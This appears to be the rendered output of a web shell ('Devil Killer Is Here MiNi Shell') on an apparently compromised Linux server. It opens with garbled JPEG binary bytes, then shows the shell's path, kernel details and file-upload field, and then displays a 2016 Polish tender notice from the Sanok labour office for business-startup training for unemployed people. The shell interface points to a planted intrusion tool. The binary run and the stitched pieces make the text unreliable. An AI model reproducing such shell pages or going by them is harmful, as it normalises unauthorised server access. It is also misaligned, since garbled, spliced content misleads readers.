JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160211/30856-N-2016.html

<p class="kh_header"><b>Sanok: ABC działalności gospodarczej</b><br>
<b>Numer ogłoszenia: 30856 - 2016; data zamieszczenia: 11.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Sanoku , ul. Rymanowska 20A, 38-500 Sanok, woj. podkarpackie, tel. 0-13 4657000, faks 0-13 4657001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.sanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ABC działalności gospodarczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi szkoleniowej przeznaczonej dla skierowanych przez Zamawiającego osób bezrobotnych, które aplikują w PUP 
w Sanoku o środki publiczne na dofinansowanie podjęcia indywidualnej działalności gospodarczej. Usługa ta będzie polegała na zorganizowaniu i przeprowadzeniu cyklu szkoleń grupowych z zakresu problematyki zakładania i prowadzenia własnej działalności gospodarczej. Wykonawca będzie prowadził szkolenia zgodnie z Programem Szkolenia, w tym Planem Nauczania opracowanym zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 r. w sprawie szczegółowych warunków realizacji oraz trybu i sposobu prowadzenia usług rynku pracy (Dz. U. z 2014, poz. 667) i wymaganiami zawartymi w niniejszej SIWZ. 
Zamawiający będzie kierował na szkolenie osoby bezrobotne w miarę powstającego zapotrzebowania to jest w związku z przyznaniem tym osobom środków publicznych na dofinansowanie  podjęcia własnej działalności gospodarczej, z zastrzeżeniem korzystania z prawa opcji. W ramach niniejszego zamówienia zamówienie podstawowe stanowi 60% ogólnej liczby 120 osób, zaś pozostałe 40% stanowi zamówienie opcjonalne (prawo opcji po stronie Zamawiającego). Zamawiający może w okresie obowiązywania umowy z dowolnej części lub całości tej ilości (liczby osób) wskazanej jako opcja skorzystać bądź nie - zależnie od bieżących potrzeb Zamawiającego  tj. zaistnienia zapotrzebowania na przedmiotowe szkolenie.
Szczegółowy opis przedmiotu i zakresu zamówienia zawiera załącznik nr 5 do niniejszej specyfikacji istotnych warunków zamówienia pn. Szczegółowy Opis Przedmiotu i Zakresu Zamówienia (dalej zwany SOPZZ) oraz wzór umowy stanowiący załącznik nr 7 do niniejszej specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy dla siedziby instytucji szkoleniowej (Wykonawcy) zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jedn. Dz. U. z 2015 r., poz.149  z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie w zakresie objętym zamówieniem, które musi wykazać, w formie załączonego do oferty wykazu głównych usług potwierdzonego odpowiednimi dowodami, z ostatnich trzech lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia upływu terminu składania ofert. Przez główne usługi rozumie się zrealizowane odpłatne zamówienia (umowy) na grupowe usługi szkoleniowe o zbieżnym z przedmiotem zamawianego szkolenia zakresem tematycznym dla co najmniej 30 uczestników każda.  Szkolenia grupowe zrealizowane w ramach jednej umowy (niezależnie czy jednorazowo czy w cyklu), będą traktowane jako jedna usługa. 
Wykaz musi zawierać wszystkie wymagane dane. Wzór wykazu zawiera załącznik nr 8 do SIWZ. Do wykazu należy dołączyć dowody czy wykazane zamówienia (umowy) zostały wykonane należycie.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, spośród głównych usług, wykonał należycie: 
5.1.2.1) co najmniej jedną usługę szkoleniową grupową z zakresu problematyki zakładania i prowadzenia przez uczestników szkolenia własnej działalności gospodarczej dla co najmniej 60 uczestników (wykazana co najmniej jedna zakończona umowa na usługę szkoleniową grupową o ww. zbieżnym z przedmiotem zamawianego szkolenia zakresem tematycznym),
lub  
5.1.2.2.) co najmniej dwie usługi szkoleniowe grupowe z zakresu problematyki zakładania i prowadzenia przez uczestników szkolenia własnej działalności gospodarczej dla co najmniej 30 uczestników każda (każda z wykazanych co najmniej dwóch zakończonych umów na usługi szkoleniowe grupowe o ww., zbieżnym 
z przedmiotem zamawianego szkolenia zakresem tematycznym).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie i nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej niżej wymienionymi osobami, które będą uczestniczyły w realizacji zamówienia w poszczególnych blokach tematycznych:

Blok I - osoba/ osoby posiadająca/posiadające: wykształcenie w zakresie rachunkowości lub finansów lub ekonomii lub prawa lub zarządzania/ przedsiębiorczości - co najmniej wyższe zawodowe lub magisterskie lub podyplomowe - a każda z nich posiada doświadczenie w prowadzeniu szkoleń grupowych z zakresu tematycznego zbieżnego z zakresem zamawianego szkolenia;  


Blok II - osoba/ osoby posiadająca/posiadające: wykształcenie w zakresie rachunkowości lub finansów lub ekonomii lub prawa lub zarządzania /przedsiębiorczości- co najmniej wyższe zawodowe lub magisterskie lub podyplomowe -  a każda z nich posiada doświadczenie w prowadzeniu szkoleń grupowych z zakresu tematycznego zbieżnego z zakresem zamawianego szkolenia; 


Blok III - osoba/ osoby posiadająca/posiadające: wykształcenie w zakresie rachunkowości lub finansów lub ekonomii lub prawa lub zarządzania /przedsiębiorczości lub marketingu - co najmniej wyższe zawodowe lub magisterskie lub podyplomowe - a każda z nich posiada doświadczenie w prowadzeniu szkoleń grupowych 
z zakresu tematycznego zbieżnego z zakresem zamawianego szkolenia. 


Blok IV - osoba/ osoby posiadająca/posiadające: wykształcenie w zakresie rachunkowości lub finansów lub ekonomii lub prawa lub zarządzania /przedsiębiorczości lub marketingu lub informatyki - co najmniej wyższe zawodowe lub magisterskie lub podyplomowe - a każda z nich posiada doświadczenie 
w prowadzeniu szkoleń grupowych z zakresu tematycznego zbieżnego z zakresem zamawianego szkolenia.  


Dla potrzeb oceny spełniania tego warunku przyjmuje się, że: 
- szkolenie grupowe to każde odrębnie zorganizowane i zrealizowane szkolenie z tematyki dot. zakładania 
i prowadzenia własnej działalności gospodarczej, dla grupy liczącej co najmniej 5 uczestników.
-posiadanie doświadczenia to przeprowadzenie jako trener co najmniej dwóch szkoleń grupowych, 
w powyższym rozumieniu. 

Wykaz musi zawierać wszystkie wymagane dane. Wzór wykazu zawiera załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie i nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca w wykazie głównych usług (za okres ostatnich 3 trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wskaże wśród tych głównych usług: 
1) co najmniej jedną należycie wykonaną grupową usługę szkoleniową (zakończona umowa) z zakresu problematyki zakładania i prowadzenia przez uczestników szkolenia własnej działalności gospodarczej dla co najmniej 60 uczestników,
lub  
2) co najmniej dwie należycie wykonane grupowe usługi szkoleniowe (zakończone umowy) z zakresu problematyki zakładania i prowadzenia przez uczestników szkolenia własnej działalności gospodarczej dla co najmniej 30 uczestników każda. 
Do ww. należy załączyć dowody czy zostały wykonane należycie. Dowodem, o których mowa w zdaniu poprzednim, jest poświadczenie. Dowodem, o którym mowa wyżej może być także oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.W przypadku gdy Zamawiający jest podmiotem na rzecz którego usługi wykazane w wykazie, o którym mowa wyżej zostały wcześniej wykonane wykonawca nie ma obowiązku przedkładania dowodów, o których mowa. Wykaz musi zawierać wszystkie wymagane informacje o wykonanych usługach, z podaniem ich wartości, przedmiotu oraz daty wykonania i odbiorcy - na formularzu zgodnym z treścią załącznika nr 8 do SIWZ (Wykaz Doświadczenie).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">7.1 W celu potwierdzenia, że oferowana usługa spełnia wymagania określone przez Zamawiającego 
w SIWZ, wykonawca składa opis zaoferowanej usługi w postaci:
7.1.1. Program szkolenia - wzór stanowi załącznik nr 11 do SIWZ
7.1.2. Plan nauczania - wzór stanowi załącznik nr 12 do SIWZ 
Jednocześnie zaleca się załączenie do oferty parafowanego SOPZZ będącego załącznikiem nr 5 do SIWZ oraz parafowanego wzoru umowy stanowiącego załącznik nr 7 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy (na podstawie opisu sposobu dokonania przez Zamawiającego oceny spełniania warunków udziału  w postępowaniu, Rozdział V SIWZ), polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy udowodnienia, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Pisemne zobowiązanie ww. podmiotów należy złożyć w oryginale. 
Ponadto w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda by z pisemnego zobowiązania lub innych dokumentów składanych wraz z ofertą wynikał wyraźnie i jednoznacznie: 
a) zakres dostępnych Wykonawcy zasobów innego podmiotu, 
b) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 
c) charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.


Umocowanie do podpisania oferty musi być dołączone do oferty, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.Pełnomocnictwo ma być złożone w oryginale albo kopii poświadczonej notarialnie.Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, chyba że Zamawiający w SIWZ lub ogłoszeniu o zamówieniu dopuścił złożenie dokumentu lub oświadczenia w określonym tam języku obcym (na zasadzie art. 9 pkt. 3 Pzp).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie trenera w przeprowadzaniu szkoleń z zamawianej tematyki - 10</li>
<li>3 - Przygotowanie trenera z zakresu danej tematyki - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień niniejszej umowy może nastąpić za obopólną zgodą Stron, w przypadku wystąpienia okoliczności opisanych poniżej:
1) zmiany postanowień umowy w zakresie ceny usługi szkoleniowej będącej przedmiotem niniejszej umowy w stosunku do treści oferty w razie zmiany stawki podatku od towarów i usług, wprowadzonej na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia umowy. W takim przypadku wysokość wynagrodzenia należnego Wykonawcy ustalana jest z uwzględnieniem aktualnej stawki podatku od towarów i usług obowiązującej na dzień wystawienia faktury (powstania obowiązku podatkowego);
2) wystąpienia siły wyższej (pod pojęciem siły wyższej rozumie się wszelkie zdarzenia                     
o charakterze nadzwyczajnym, niemożliwe do przewidzenia i zapobieżenia, a w szczególności: katastrofalne działanie sił przyrody, wojny, mobilizacje, zamknięcie granic, strajki generalne oraz akty władzy publicznej), co uniemożliwia wykonanie przedmiotu umowy zgodnie ze specyfikacją istotnych warunków zamówienia (SIWZ);  
2) wówczas gdy w trakcie realizacji umowy wynikła potrzeba powierzenia wykonania części zamówienia podwykonawcy czego Wykonawca nie przewidział w ofercie lub zachodzi potrzeba zmiany podwykonawcy, zatrudnionego zgodnie z ofertą do wykonania określonej części zamówienia, Zamawiający dopuszcza taką możliwość pod warunkiem, że potencjał wykonawczy dla tego zakresu umowy nie ulegnie pogorszeniu 
w stosunku do oferty Wykonawcy;
3) zmiany miejsca wykonywania zamówienia na terenie miasta Sanoka w zakresie adresów wskazanych 
w § 3 ust. 1 umowy. Zmiany, o których mowa nie mogą prowadzić do obniżenia wymagań określonych 
w SIWZ oraz nie mogą powodować podwyższenia wynagrodzenia Wykonawcy ustalonego w § 6 umowy.
4) zmiany wykładowcy przewidzianego do prowadzenia zajęć dydaktycznych w poszczególnych blokach tematycznych, wskazanych w § 3 pkt 6 umowy, w razie zajścia trudnych do przewidzenia w dniu zawarcia umowy okoliczności dotyczących osoby wykładowcy, o ile nowy wykładowca będzie posiadał odpowiednie nie niższe niż wymagane w SIWZ i zadeklarowane w ofercie kwalifikacje, wykształcenie  
i doświadczenie.
2. Wszystkie postanowienia określone w ust.1 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Warunkiem dokonania zmian postanowień zawartej umowy jest zgoda obu Stron wyrażona w formie pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pup.sanok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Sanoku, ul. Rymanowska 20A, 38 - 500 Sanok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2016 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Sanoku, ul. Rymanowska 20A, budynek A, II piętro, pok. Nr 14 -Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na dzień ogłoszenia niniejszego przetargu nieograniczonego przewiduje się realizację części zamówienia w ramach projektu Aktywizacja osób młodych pozostających bez pracy w powiecie sanockim (II) w ramach Inicjatywy na rzecz zatrudnienia ludzi młodych. Ww. projekt współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Wiedza Edukacja Rozwój (PO WER), ewentualnie także w ramach projektu współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020 pt. Aktywizacja osób powyżej 29 r.ż. pozostających bez pracy w powiecie sanockim (II)..</p>
